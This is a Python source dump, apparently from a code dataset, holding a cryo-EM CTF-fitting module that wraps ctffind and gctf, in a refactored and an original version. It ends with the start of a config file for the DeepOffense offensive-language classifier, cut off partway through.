raise ValueError("Sorry tool: " + tool + " was not found.")
# save data common for ctffind and gctf
new.phases.append(res_one["phase"])
new.defoci.append(res_one["defocus"])
new.defoci_1.append(res_one['defocus_1'])
new.defoci_2.append(res_one['defocus_2'])
new.resolution.append(res_one['resolution'])
new.pixel_a.append(res_one['pixel_a'])
new.angle.append(res_one['angle'])
new.ctf_path.append(res_one['ctf_path'])
# keep track of n images processed so far
print_head = False
index = index + 1
if (max_images is not None) and (index > max_images): break
if flatten: break
# plot phases
if plot_phases:
plt.figure()
plt.bar(list(range(index)), new.phases)
plt.plot([0, index], [0.5, 0.5], 'r--')
plt.ylabel('Phase shift [$\pi$]')
plt.xlabel('Images')
plt.title("Phase shift summary")
# plot defocus
if plot_defoci:
plt.figure()
plt.bar(list(range(index)), new.defoci)
plt.ylabel('Defocus [$\mu m$]')
plt.xlabel('Images')
plt.title("Defocus summary")
# plot resolution
if plot_resolution:
plt.figure()
plt.bar(list(range(index)), new.resolution)
plt.ylabel('Resolution [nm]')
plt.xlabel('Images')
plt.title("Resolution summary")
return new
@classmethod
def ctffind(
        cls, image_path, ctf_dir, params, pixel_a=None, flatten=False,
        executable='ctffind', param_file='ctf_params.txt', fast=False,
        print_results=True, print_head=True,
        plot_ctf=True, show_legend=True):
    """
    Determines and shows CTF fits of one image using ctffind.

    Arguments are documented in find(). Returns a dict with keys:
    defocus_1, defocus_2, defocus [um], angle, phase [pi], ccc,
    resolution [nm], pixel_a [A] and ctf_path.

    Fixes over the previous version:
      - the parameter file handle and the handle passed to ctffind's
        stdin are now closed deterministically (previously leaked)
      - an unsupported type for arg params raises ValueError instead of
        a confusing UnboundLocalError
    """

    # make ctf dir if it doesn't exist
    if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)

    # find pixel size from the image header, unless given explicitly
    if pixel_a is None:
        pixel_a = cls.read_pixel_size(image_path=image_path)

    # flatten frame stack
    if flatten:
        image_path = cls.flatten_stack(
            stack_path=image_path, flat_dir=ctf_dir)

    # keep params if list, merge with defaults if dict
    if isinstance(params, list):
        comb_params = [pixel_a] + params
    elif isinstance(params, dict):
        params_dict = cls.default_params_ctffind.copy()
        params_dict.update(params)
        params_dict['pixel_a'] = pixel_a
        param_names = cls.make_param_names_ctffind(params=params_dict)
        comb_params = [params_dict[name] for name in param_names]
    else:
        raise ValueError(
            "Argument params has to be a list or a dict, not "
            + type(params).__name__)

    # set ctffind out paths
    image_dir, image_name = os.path.split(image_path)
    image_base, image_extension = image_name.rsplit('.', 1)
    ctf_path = os.path.join(ctf_dir, image_base + '_ctf.mrc')
    ctf_txt_path = os.path.join(ctf_dir, image_base + '_ctf.txt')
    ctf_avrot_path = os.path.join(ctf_dir, image_base + '_ctf_avrot.txt')

    # write ctf parameters to a file; ctffind reads them from stdin
    param_path = os.path.join(ctf_dir, param_file)
    with open(param_path, 'w') as pf:
        pf.write(image_path + '\n')
        pf.write(ctf_path + '\n')
        pf.writelines(str(par) + '\n' for par in comb_params)

    # execute ctffind (shell equivalent: ctffind < param_path)
    if fast:
        ctf_cmd = [executable, '--fast']
    else:
        ctf_cmd = [executable]
    try:
        with open(param_path) as param_fd:
            subprocess.check_call(ctf_cmd, stdin=param_fd)
    except Exception as exc:
        # workaround for ctffind command returning code 255 (4.1.8, 09.2018)
        logging.debug('CalledProcessError: ' + str(exc))

    # read results; defoci converted to um, resolution to nm, phase to [pi]
    ctf_txt = np.loadtxt(ctf_txt_path)
    results = {
        "defocus_1":ctf_txt[1]/10000., "defocus_2":ctf_txt[2]/10000.,
        "angle" : ctf_txt[3], "phase":old_div(ctf_txt[4],np.pi),
        "ccc" : ctf_txt[5], "resolution" : ctf_txt[6] / 10.,
        'pixel_a':pixel_a}
    results['defocus'] = (results['defocus_1'] + results['defocus_2']) / 2.
    results['ctf_path'] = ctf_path

    # prepare header for defoci and phases, centered over the image name
    if print_head:
        left_space = ' ' * old_div((len(image_name) - 5), 2)
        right_space = ' ' * old_div((len(image_name) - 4), 2)
        head_1 = (
            left_space + "Image" + right_space +
            " Defocus 1 Defocus 2 Phase Resolution")
        head_2 = (
            left_space + " " + right_space +
            " um um [pi] nm ")

    # prepare results line
    if print_results:
        data_format = '%s %6.2f %6.2f %6.2f %6.2f '
        data_vars = (
            image_name, results["defocus_1"], results["defocus_2"],
            results["phase"], results["resolution"])

    # print
    if print_head:
        print(head_1)
        print(head_2)
    if print_results:
        print(data_format % data_vars)

    # plot rotationally averaged power spectrum, CTF fit and fit quality
    if plot_ctf:
        plt.figure()
        avrot_data = np.loadtxt(ctf_avrot_path)
        x_data = avrot_data[0] / pixel_a
        plt.plot(x_data, avrot_data[2], 'g-', label='PS')
        plt.plot(
            x_data, avrot_data[3], color='orange', linewidth=2,
            label='CTF fit')
        plt.plot(
            x_data, avrot_data[4], color='blue', linewidth=2,
            label='Quality')
        plt.ylim(-0.1, 1.1)
        plt.xlabel("Spatial frequency [1/A])")
        plt.ylabel("Amplitude")
        if show_legend: plt.legend()
        plt.show()

    return results
@classmethod
def make_param_names_ctffind(cls, params):
"""
Makes a list of parameter names that's suitable for ctffind 4.1 and
it is in accordance with the specified params.
Argument:
- params: dict of parameters
Returns parameter list
"""
# optional parts
if params['restraint_astig'] in ['yes', 'y']:
restraint_astig_part = ['restraint_astig','tolerated_astig']
else:
restraint_astig_part = ['restraint_astig']
if (params['phase'] == 'yes') or (params['phase'] == 'y'):
phase_part = ['phase', 'min_phase', 'max_phase', 'phase_step']
else:
phase_part = ['phase']
# combine
param_names = (
cls.param_names_ctffind_4_1[:12] + restraint_astig_part
+ phase_part + ['expert'])
return param_names
@classmethod
def gctf(
cls, image_path, ctf_dir, params, pixel_a=None, flatten=False,
executable='gctf', plot_ps=True, plot_ctf=True,
b_plot=True, exp_f_plot=False, show_legend=True,
print_results=True, print_head=True, print_validation=False):
"""
Determines and shows CTF fits of one image using gctf.
See find() for more information.
"""
# make ctf dir if doesn't exist
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
# find pixel size
if pixel_a is None:
pixel_a = cls.read_pixel_size(image_path=image_path)
# flatten frame stack if needed
if flatten:
image_path = cls.flatten_stack(
stack_path=image_path, flat_dir=ctf_dir)
# prepare parameters
gctf_names = {
'pixel_a':'apix', 'voltage':'kV', 'cs':'Cs', 'amp':'ac',
'box':'boxsize', 'min_res':'resL', 'max_res':'resH',
'min_def':'defL', 'max_def':'defH', 'def_step':'defS',
'astig':'astm', 'phase':'phase', 'min_phase':'phase_shift_L',
'max_phase':'phase_shift_H', 'phase_step':'phase_shift_S'}
params["pixel_a"] = pixel_a
params_list = [
["--" + gctf_names.get(key, key), str(val)]
for key, val in list(params.items())]
params_list = pyto.util.nested.flatten(params_list)
params_list = [par for par in params_list if len(par) > 0]
#print(params_list)
# execute ctffind
ctf_cmd = [executable] + params_list + [image_path]
call_status = subprocess.check_call(ctf_cmd)
# set gctf out paths
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
epa_path = os.path.join(ctf_dir, image_base + '_EPA.log')
gctf_path = os.path.join(ctf_dir, image_base + '_gctf.log')
ctf_path = os.path.join(ctf_dir, image_base + '.ctf')
tmp_epa_path = os.path.join(image_dir, image_base + '_EPA.log')
tmp_gctf_path = os.path.join(image_dir, image_base + '_gctf.log')
tmp_ctf_path = os.path.join(image_dir, image_base + '.ctf')
# move generated files to ctf_dir
if image_dir != ctf_dir:
call_status = subprocess.check_call(['mv', tmp_epa_path, epa_path])
call_status = subprocess.check_call(
['mv', tmp_gctf_path, gctf_path])
call_status = subprocess.check_call(['mv', tmp_ctf_path, ctf_path])
call_status = subprocess.check_call(
['mv', 'micrographs_all_gctf.star', ctf_dir])
# read results
in_last_cycle = False
in_last_cycle_data = False
validation_lines = []
for line in open(gctf_path):
# read defocus
if line.find('LAST CYCLE') >= 0:
in_last_cycle = True
#print line.strip('\n')
elif in_last_cycle and (line.find('Defocus_U') >= 0):
#print line.strip('\n')
head_split = line.strip().split()
in_last_cycle_data = True
elif in_last_cycle_data:
#print line.strip('\n')
data_split = line.strip().split()[:-2]
in_last_cycle_data = False
# read res limit and b factor
elif in_last_cycle and line.startswith('Resolution limit'):
resolution = float(line.split()[-1])
elif in_last_cycle and line.startswith('Estimated Bfactor'):
b_factor = float(line.split()[-1])
in_last_cycle = False
# read validation
elif line.find('VALIDATION_SCORE') >= 0:
validation_lines.append(line.strip('\n'))
# extract results
results_native = dict(
[(head, float(value))
for head, value in zip(head_split, data_split)])
results_native["Defocus_U"] = results_native["Defocus_U"] / 10000.
results_native["Defocus_V"] = results_native["Defocus_V"] / 10000.
#print(results_native)
key_dict = {
"Defocus_U":"defocus_1", "Defocus_V":"defocus_2",
"Angle":"angle", "CCC":"ccc", "Phase_shift":"phase"}
results = dict([
(key_dict[old_key], value)
for old_key, value in list(results_native.items())])
results['defocus'] = (results['defocus_1'] + results['defocus_2']) / 2.
results['phase'] = results.get('phase', 0) / 180.
results["resolution"] = resolution / 10.
results["b_factor"] = b_factor
#if results.get("phase") is None: results["phase"] = 0
results['ctf_path'] = ctf_path
results['pixel_a'] = pixel_a
for val_line in validation_lines:
val_list = val_line.strip().split()
name_suf = val_list[0].replace('-', '_')
results[cls.validation_prefix + name_suf] = int(val_list[-1])
# prepare header for defoci and phases
if print_head:
left_space = ' ' * (old_div((len(image_name) - 5), 2))
right_space = ' ' * (old_div((len(image_name) - 4), 2))
head_1 = (
left_space + "Image" + right_space +
" Defocus 1 Defocus 2 Phase Resolution")
head_2 = (
left_space + " " + right_space +
" um um [pi] nm ")
# prepare results
if print_results:
data_format = '%s %6.2f %6.2f %6.2f %6.2f '
data_vars = (
image_name, results["defocus_1"], results["defocus_2"],
results["phase"], results["resolution"])
# add validation to header and results
val_names = np.sort(
[val_nam for val_nam in results
if val_nam.startswith(cls.validation_prefix)])[::-1]
for val_nam in val_names:
if print_head:
head_1 += (" " + val_nam.split(cls.validation_prefix, 1)[1])
head_2 += " "
if print_results:
data_format += ' %2d '
data_vars += (results[val_nam],)
# print
if print_head:
print(head_1)
print(head_2)
if print_results:
print(data_format % data_vars)
# print validation
if print_validation:
for val_line in validation_lines:
print(val_line)
# plot ctf
epa = np.loadtxt(epa_path, skiprows=1)
if plot_ps:
plt.figure()
plt.plot(1./epa[:,0], epa[:,2])
plt.ylabel('ln(|F|)')
#if show_legend: plt.legend()
plt.show()
if plot_ctf:
plt.figure()
if b_plot:
exp_b = np.exp(-b_factor * 1./epa[:,0]**2 / 4.)
else:
exp_b = 1
plt.plot(1./epa[:,0], epa[:,1] * exp_b, label="CTF fit")
if exp_f_plot:
plt.plot(
1./epa[:,0], np.exp(epa[:,3]), label="$e^{ln(|F|-Bg)}$")
else:
plt.plot(1./epa[:,0], epa[:,3], label="$ln(|F|-Bg)$")
plt.xlabel('Resolution [1/A]')
if show_legend: plt.legend()
plt.show()
# return
return results
@classmethod
def read_pixel_size(cls, image_path):
    """
    Reads pixel size from an image file header.

    Raises ValueError if the header contains no pixel size, or a pixel
    size of 0.

    Argument:
      - image_path: image path

    Returns: pixel size in A
    """
    # shared message for both failure modes
    no_pixel_msg = (
        "Pixel size could not be found from image " + image_path +
        ". Please specify pixel_a as an argument.")

    # ".st" files are mrc under a different extension
    image_io = ImageIO()
    if image_path.endswith('.st'):
        image_io.readHeader(file=image_path, fileFormat='mrc')
    else:
        image_io.readHeader(file=image_path)

    pixel = image_io.pixel
    if pixel is None:
        raise ValueError(no_pixel_msg)
    if isinstance(pixel, (list, tuple)):
        pixel = pixel[0]

    # header stores nm; convert to A, and reject a zero pixel size
    pixel_a = 10 * pixel
    if pixel_a == 0:
        raise ValueError(no_pixel_msg)
    return pixel_a
@classmethod
def flatten_stack(cls, stack_path, flat_dir):
    """
    Flattens an image stack: sums all z-slices and writes the resulting
    2D image to flat_dir.

    Arguments:
      - stack_path: path to the image stack
      - flat_dir: directory where the resulting image is saved

    Returns resulting (flattened) image path
    """
    # parse stack path; ".st" stacks are mrc files under another extension
    src_dir, src_name = os.path.split(stack_path)
    src_base, src_ext = src_name.rsplit('.', 1)
    if src_ext == 'st':
        out_ext, file_format = 'mrc', 'mrc'
    else:
        out_ext, file_format = src_ext, None

    # read, sum z-slices (keeping dtype) and write the flat image
    flat_path = os.path.join(flat_dir, src_base + '_flat.' + out_ext)
    stack = Image.read(file=stack_path, fileFormat=file_format)
    stack.data = stack.data.sum(axis=2, dtype=stack.data.dtype)
    stack.write(file=flat_path, pixel=stack.pixelsize)
    return flat_path
| 39.074413 | 80 | 0.558685 | from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from builtins import zip
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
from past.builtins import basestring
__version__ = "$Revision$"
import os
import subprocess
import logging
import numpy as np
import matplotlib.pyplot as plt
import pyto.util.nested
from pyto.io.image_io import ImageIO
from pyto.grey.image import Image
class Ctf(object):
validation_prefix = "validation_"
default_params_ctffind = {
"pixel_a":1, "cs":2.7, "amp":0.1, "phase":"no", 'box':512,
'min_res':30, 'max_res':5, 'min_def':5000, 'max_def':50000,
'def_step':500, 'astig':100, 'known_astig':'no', 'slow_search':'yes',
'restraint_astig':'yes', 'tolerated_astig':200,
'phase':'yes', 'min_phase':0, 'max_phase':2, 'phase_step':0.1,
'expert':'no'}
param_names_ctffind_4_0 = [
'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'astig', 'phase',
'min_phase', 'max_phase', 'phase_step']
param_names_ctffind_4_1 = [
'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'known_astig', 'slow_search',
'restraint_astig','tolerated_astig',
'phase', 'min_phase', 'max_phase', 'phase_step', 'expert']
def __init__(self):
self.image_path_orig = []
self.image_inds = []
self.image_path = []
self.ctf_path = []
self.phases = []
self.defoci_1 = []
self.defoci_2 = []
self.defoci = []
self.resolution = []
self.pixel_a = []
self.angle = []
@classmethod
def find(
cls, image_dir, image_prefix, ctf_dir, params, pixel_a=None,
flatten='auto', tool='ctffind', executable=None,
param_file='ctf_params.txt', fast=False, max_images=None,
plot_ctf=True, plot_ps=True, b_plot=True, exp_f_plot=False,
show_legend=True, plot_phases=True, plot_defoci=True,
plot_resolution=True, print_results=True, print_validation=False):
index = 0
new = cls()
print_head = True
if plot_ctf and fast:
print(
"Warning: CTF will not be plotted because fast execution"
+ " was chosen")
if tool == 'ctffind':
if executable is None:
executable = 'ctffind'
elif tool == 'gctf':
if executable is None:
executable = 'gctf'
else:
raise ValueError(
"CTF determination tool " + str(tool) + " was not understood.")
new.tool = tool
file_list = np.sort(os.listdir(image_dir))
for image_name in file_list:
if not image_name.startswith(image_prefix): continue
if not (image_name.endswith('.mrc') or image_name.endswith('.st')
or image_name.endswith('.em')):
continue
if image_name.endswith('ctf.mrc'): continue
image_path = os.path.join(image_dir, image_name)
im_io = ImageIO(file=image_path)
if image_name.endswith('.st'):
im_io.readHeader(fileFormat='mrc')
else:
im_io.readHeader()
z_dim = im_io.shape[2]
n_digits = int(np.ceil(np.log10(z_dim)))
if isinstance(flatten, bool):
pass
elif isinstance(flatten, basestring) and (flatten == 'auto'):
if z_dim > 1:
flatten = True
else:
flatten = False
else:
raise ValueError(
"Argument flatten: "+ str(flatten) +" was not understood.")
if (z_dim > 1) and not flatten:
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
image_name_new_tmplt = (
image_base + '_%0' + str(n_digits) + 'd.mrc')
if image_name.endswith('.st'):
stack = Image.read(
image_path, memmap=True, fileFormat='mrc')
else:
stack = Image.read(image_path, memmap=True)
else:
image_path_to_read = image_path
for image_in_stack_ind in range(z_dim):
if (z_dim > 1) and not flatten:
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
image_path_to_read = os.path.join(
ctf_dir, (image_name_new_tmplt % image_in_stack_ind))
one_image = Image()
one_image.data = stack.data[:,:,image_in_stack_ind]
one_image.write(
file=image_path_to_read, pixel=stack.pixelsize)
new.image_path_orig.append(image_path)
new.image_inds.append(image_in_stack_ind)
new.image_path.append(image_path_to_read)
if tool == 'ctffind':
res_one = cls.ctffind(
image_path=image_path_to_read, flatten=flatten,
ctf_dir=ctf_dir, executable=executable,
pixel_a=pixel_a, params=params,
param_file=param_file, fast=fast, print_head=print_head,
print_results= print_results,
plot_ctf=plot_ctf, show_legend=show_legend)
elif tool == 'gctf':
res_one = cls.gctf(
image_path=image_path_to_read, params=params,
pixel_a=pixel_a, flatten=flatten, ctf_dir=ctf_dir,
executable=executable,
plot_ctf=plot_ctf, plot_ps=plot_ps ,b_plot=b_plot,
exp_f_plot=exp_f_plot, show_legend=show_legend,
print_results=print_results,
print_head=print_head,
print_validation=print_validation)
try:
new.b_factor.append(res_one['b_factor'])
except AttributeError:
new.b_factor = [res_one['b_factor']]
for name, value in list(res_one.items()):
if name.startswith(cls.validation_prefix):
try:
previous_val = getattr(new, name)
previous_val.append(value)
setattr(new, name, previous_val)
except AttributeError:
setattr(new, name, [value])
else:
raise ValueError("Sorry tool: " + tool + " was not found.")
new.phases.append(res_one["phase"])
new.defoci.append(res_one["defocus"])
new.defoci_1.append(res_one['defocus_1'])
new.defoci_2.append(res_one['defocus_2'])
new.resolution.append(res_one['resolution'])
new.pixel_a.append(res_one['pixel_a'])
new.angle.append(res_one['angle'])
new.ctf_path.append(res_one['ctf_path'])
print_head = False
index = index + 1
if (max_images is not None) and (index > max_images): break
if flatten: break
if plot_phases:
plt.figure()
plt.bar(list(range(index)), new.phases)
plt.plot([0, index], [0.5, 0.5], 'r--')
plt.ylabel('Phase shift [$\pi$]')
plt.xlabel('Images')
plt.title("Phase shift summary")
if plot_defoci:
plt.figure()
plt.bar(list(range(index)), new.defoci)
plt.ylabel('Defocus [$\mu m$]')
plt.xlabel('Images')
plt.title("Defocus summary")
if plot_resolution:
plt.figure()
plt.bar(list(range(index)), new.resolution)
plt.ylabel('Resolution [nm]')
plt.xlabel('Images')
plt.title("Resolution summary")
return new
@classmethod
def ctffind(
cls, image_path, ctf_dir, params, pixel_a=None, flatten=False,
executable='ctffind', param_file='ctf_params.txt', fast=False,
print_results=True, print_head=True,
plot_ctf=True, show_legend=True):
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
# find pixel size
if pixel_a is None:
pixel_a = cls.read_pixel_size(image_path=image_path)
# flatten frame stack
if flatten:
image_path = cls.flatten_stack(
stack_path=image_path, flat_dir=ctf_dir)
# default params ctffind 4.0.17 (moved to top of this file anyway)
#default_params = {
# "pixel_a":1, "cs":2.7, "amp":0.1, "phase":"no", 'box':512,
# 'min_res':30, 'max_res':5, 'min_def':5000, 'max_def':50000,
# 'def_step':500, 'astig':100, 'phase':'no', 'min_phase':0,
# 'max_phase':2, 'phase_step':0.1}
#param_names = [
# 'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
# 'min_def', 'max_def', 'def_step', 'astig', 'phase',
# 'min_phase', 'max_phase', 'phase_step']
# keep params if list, add default if dict
if isinstance(params, list):
comb_params = [pixel_a] + params
elif isinstance(params, dict):
params_dict = cls.default_params_ctffind.copy()
params_dict.update(params)
params_dict['pixel_a'] = pixel_a
param_names = cls.make_param_names_ctffind(params=params_dict)
comb_params = [params_dict[name] for name in param_names]
# set ctffind out paths
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
ctf_path = os.path.join(ctf_dir, image_base + '_ctf.mrc')
ctf_txt_path = os.path.join(ctf_dir, image_base + '_ctf.txt')
ctf_avrot_path = os.path.join(ctf_dir, image_base + '_ctf_avrot.txt')
# wite ctf parameters to a file
param_path = os.path.join(ctf_dir, param_file)
pf = open(param_path, 'w')
pf.write(image_path + '\n')
pf.write(ctf_path + '\n')
str_params = [str(par) + '\n' for par in comb_params]
pf.writelines(str_params)
pf.flush()
# execute ctffind
# shell commands that work:
# - ctffind < param_path
# - cat params.txt | ctffind
#print(image)
if fast:
ctf_cmd = [executable, '--fast']
else:
ctf_cmd = [executable]
try:
subprocess.check_call(ctf_cmd, stdin=open(param_path))
except Exception as exc:
# workaround for ctffind command returning code 255 (4.1.8, 09.2018)
logging.debug('CalledProcessError: ' + str(exc))
# read results:
ctf_txt = np.loadtxt(ctf_txt_path)
results = {
"defocus_1":ctf_txt[1]/10000., "defocus_2":ctf_txt[2]/10000.,
"angle" : ctf_txt[3], "phase":old_div(ctf_txt[4],np.pi),
"ccc" : ctf_txt[5], "resolution" : ctf_txt[6] / 10.,
'pixel_a':pixel_a}
results['defocus'] = (results['defocus_1'] + results['defocus_2']) / 2.
results['ctf_path'] = ctf_path
# prepare header for defoci and phases
if print_head:
left_space = ' ' * old_div((len(image_name) - 5), 2)
right_space = ' ' *old_div ((len(image_name) - 4), 2)
head_1 = (
left_space + "Image" + right_space +
" Defocus 1 Defocus 2 Phase Resolution")
head_2 = (
left_space + " " + right_space +
" um um [pi] nm ")
# prepare results
if print_results:
data_format = '%s %6.2f %6.2f %6.2f %6.2f '
data_vars = (
image_name, results["defocus_1"], results["defocus_2"],
results["phase"], results["resolution"])
# print
if print_head:
print(head_1)
print(head_2)
if print_results:
print(data_format % data_vars)
# plot ctf
if plot_ctf:
plt.figure()
avrot_data = np.loadtxt(ctf_avrot_path)
x_data = avrot_data[0] / pixel_a
plt.plot(x_data, avrot_data[2], 'g-', label='PS')
plt.plot(
x_data, avrot_data[3], color='orange', linewidth=2,
label='CTF fit')
plt.plot(
x_data, avrot_data[4], color='blue', linewidth=2,
label='Quality')
plt.ylim(-0.1, 1.1)
plt.xlabel("Spatial frequency [1/A])")
plt.ylabel("Amplitude")
if show_legend: plt.legend()
plt.show()
return results
@classmethod
def make_param_names_ctffind(cls, params):
# optional parts
if params['restraint_astig'] in ['yes', 'y']:
restraint_astig_part = ['restraint_astig','tolerated_astig']
else:
restraint_astig_part = ['restraint_astig']
if (params['phase'] == 'yes') or (params['phase'] == 'y'):
phase_part = ['phase', 'min_phase', 'max_phase', 'phase_step']
else:
phase_part = ['phase']
# combine
param_names = (
cls.param_names_ctffind_4_1[:12] + restraint_astig_part
+ phase_part + ['expert'])
return param_names
@classmethod
def gctf(
cls, image_path, ctf_dir, params, pixel_a=None, flatten=False,
executable='gctf', plot_ps=True, plot_ctf=True,
b_plot=True, exp_f_plot=False, show_legend=True,
print_results=True, print_head=True, print_validation=False):
# make ctf dir if doesn't exist
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
if pixel_a is None:
pixel_a = cls.read_pixel_size(image_path=image_path)
if flatten:
image_path = cls.flatten_stack(
stack_path=image_path, flat_dir=ctf_dir)
gctf_names = {
'pixel_a':'apix', 'voltage':'kV', 'cs':'Cs', 'amp':'ac',
'box':'boxsize', 'min_res':'resL', 'max_res':'resH',
'min_def':'defL', 'max_def':'defH', 'def_step':'defS',
'astig':'astm', 'phase':'phase', 'min_phase':'phase_shift_L',
'max_phase':'phase_shift_H', 'phase_step':'phase_shift_S'}
params["pixel_a"] = pixel_a
params_list = [
["--" + gctf_names.get(key, key), str(val)]
for key, val in list(params.items())]
params_list = pyto.util.nested.flatten(params_list)
params_list = [par for par in params_list if len(par) > 0]
ctf_cmd = [executable] + params_list + [image_path]
call_status = subprocess.check_call(ctf_cmd)
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
epa_path = os.path.join(ctf_dir, image_base + '_EPA.log')
gctf_path = os.path.join(ctf_dir, image_base + '_gctf.log')
ctf_path = os.path.join(ctf_dir, image_base + '.ctf')
tmp_epa_path = os.path.join(image_dir, image_base + '_EPA.log')
tmp_gctf_path = os.path.join(image_dir, image_base + '_gctf.log')
tmp_ctf_path = os.path.join(image_dir, image_base + '.ctf')
if image_dir != ctf_dir:
call_status = subprocess.check_call(['mv', tmp_epa_path, epa_path])
call_status = subprocess.check_call(
['mv', tmp_gctf_path, gctf_path])
call_status = subprocess.check_call(['mv', tmp_ctf_path, ctf_path])
call_status = subprocess.check_call(
['mv', 'micrographs_all_gctf.star', ctf_dir])
in_last_cycle = False
in_last_cycle_data = False
validation_lines = []
for line in open(gctf_path):
if line.find('LAST CYCLE') >= 0:
in_last_cycle = True
elif in_last_cycle and (line.find('Defocus_U') >= 0):
head_split = line.strip().split()
in_last_cycle_data = True
elif in_last_cycle_data:
data_split = line.strip().split()[:-2]
in_last_cycle_data = False
elif in_last_cycle and line.startswith('Resolution limit'):
resolution = float(line.split()[-1])
elif in_last_cycle and line.startswith('Estimated Bfactor'):
b_factor = float(line.split()[-1])
in_last_cycle = False
elif line.find('VALIDATION_SCORE') >= 0:
validation_lines.append(line.strip('\n'))
results_native = dict(
[(head, float(value))
for head, value in zip(head_split, data_split)])
results_native["Defocus_U"] = results_native["Defocus_U"] / 10000.
results_native["Defocus_V"] = results_native["Defocus_V"] / 10000.
key_dict = {
"Defocus_U":"defocus_1", "Defocus_V":"defocus_2",
"Angle":"angle", "CCC":"ccc", "Phase_shift":"phase"}
results = dict([
(key_dict[old_key], value)
for old_key, value in list(results_native.items())])
results['defocus'] = (results['defocus_1'] + results['defocus_2']) / 2.
results['phase'] = results.get('phase', 0) / 180.
results["resolution"] = resolution / 10.
results["b_factor"] = b_factor
results['ctf_path'] = ctf_path
results['pixel_a'] = pixel_a
for val_line in validation_lines:
val_list = val_line.strip().split()
name_suf = val_list[0].replace('-', '_')
results[cls.validation_prefix + name_suf] = int(val_list[-1])
if print_head:
left_space = ' ' * (old_div((len(image_name) - 5), 2))
right_space = ' ' * (old_div((len(image_name) - 4), 2))
head_1 = (
left_space + "Image" + right_space +
" Defocus 1 Defocus 2 Phase Resolution")
head_2 = (
left_space + " " + right_space +
" um um [pi] nm ")
if print_results:
data_format = '%s %6.2f %6.2f %6.2f %6.2f '
data_vars = (
image_name, results["defocus_1"], results["defocus_2"],
results["phase"], results["resolution"])
val_names = np.sort(
[val_nam for val_nam in results
if val_nam.startswith(cls.validation_prefix)])[::-1]
for val_nam in val_names:
if print_head:
head_1 += (" " + val_nam.split(cls.validation_prefix, 1)[1])
head_2 += " "
if print_results:
data_format += ' %2d '
data_vars += (results[val_nam],)
if print_head:
print(head_1)
print(head_2)
if print_results:
print(data_format % data_vars)
if print_validation:
for val_line in validation_lines:
print(val_line)
epa = np.loadtxt(epa_path, skiprows=1)
if plot_ps:
plt.figure()
plt.plot(1./epa[:,0], epa[:,2])
plt.ylabel('ln(|F|)')
plt.show()
if plot_ctf:
plt.figure()
if b_plot:
exp_b = np.exp(-b_factor * 1./epa[:,0]**2 / 4.)
else:
exp_b = 1
plt.plot(1./epa[:,0], epa[:,1] * exp_b, label="CTF fit")
if exp_f_plot:
plt.plot(
1./epa[:,0], np.exp(epa[:,3]), label="$e^{ln(|F|-Bg)}$")
else:
plt.plot(1./epa[:,0], epa[:,3], label="$ln(|F|-Bg)$")
plt.xlabel('Resolution [1/A]')
if show_legend: plt.legend()
plt.show()
return results
@classmethod
def read_pixel_size(cls, image_path):
image_io = ImageIO()
if image_path.endswith('.st'):
image_io.readHeader(file=image_path, fileFormat='mrc')
else:
image_io.readHeader(file=image_path)
if image_io.pixel is not None:
if isinstance(image_io.pixel, (list, tuple)):
pixel_a = 10 * image_io.pixel[0]
else:
pixel_a = 10 * image_io.pixel
else:
raise ValueError(
"Pixel size could not be found from image " + image_path +
". Please specify pixel_a as an argument.")
if pixel_a == 0:
raise ValueError(
"Pixel size could not be found from image " + image_path +
". Please specify pixel_a as an argument.")
return pixel_a
@classmethod
def flatten_stack(cls, stack_path, flat_dir):
stack_dir, stack_name = os.path.split(stack_path)
stack_base, stack_extension = stack_name.rsplit('.', 1)
if stack_extension == 'st':
stack_extension = 'mrc'
file_format = 'mrc'
else:
file_format = None
flat_path = os.path.join(
flat_dir, stack_base + '_flat.' + stack_extension)
frame = Image.read(file=stack_path, fileFormat=file_format)
frame.data = np.sum(frame.data, axis=2, dtype=frame.data.dtype)
frame.write(file=flat_path, pixel=frame.pixelsize)
return flat_path
| true | true |
f7101a83b95d3f574f2be24cf7bb5968d97a4765 | 3,783 | py | Python | examples/bengali/bengali_deepoffense_config.py | TharinduDR/DeepOffense | 8715006707ac0272cc534b3d6844ef10367400e9 | [
"Apache-2.0"
] | 5 | 2020-05-31T07:40:36.000Z | 2022-02-13T19:18:40.000Z | examples/greek/greek_deepoffense_config.py | TharinduDR/DeepOffense | 8715006707ac0272cc534b3d6844ef10367400e9 | [
"Apache-2.0"
] | null | null | null | examples/greek/greek_deepoffense_config.py | TharinduDR/DeepOffense | 8715006707ac0272cc534b3d6844ef10367400e9 | [
"Apache-2.0"
] | 2 | 2021-03-25T12:44:04.000Z | 2021-03-25T16:50:59.000Z | from multiprocessing import cpu_count
# Input/output locations and model selection for the DeepOffense run.
TEMP_DIRECTORY = "temp/data"
TRAIN_FILE = "train.tsv"
TEST_FILE = "test.tsv"
DEV_RESULT_FILE = "dev_result.tsv"
DEV_EVAL_FILE = 'dev_eval.txt'
RESULT_FILE = "result.csv"
SUBMISSION_FOLDER = "transformers"
SUBMISSION_FILE = "transformers"

MODEL_TYPE = "xlmroberta"
MODEL_NAME = "xlm-roberta-large"
LANGUAGE_FINETUNE = False
SEED = 777


def _make_args(base_dir, **overrides):
    """
    Build a simpletransformers-style argument dict.

    The settings shared by the classifier and the language-model runs
    live here once; `base_dir` selects the output/cache tree and
    `overrides` supplies the run-specific values (sequence length,
    epochs, logging cadence, ...).
    """
    args = {
        'output_dir': base_dir + 'outputs/',
        "best_model_dir": base_dir + "outputs/best_model",
        'cache_dir': base_dir + 'cache_dir/',

        'fp16': False,
        'fp16_opt_level': 'O1',
        'train_batch_size': 8,
        'gradient_accumulation_steps': 1,
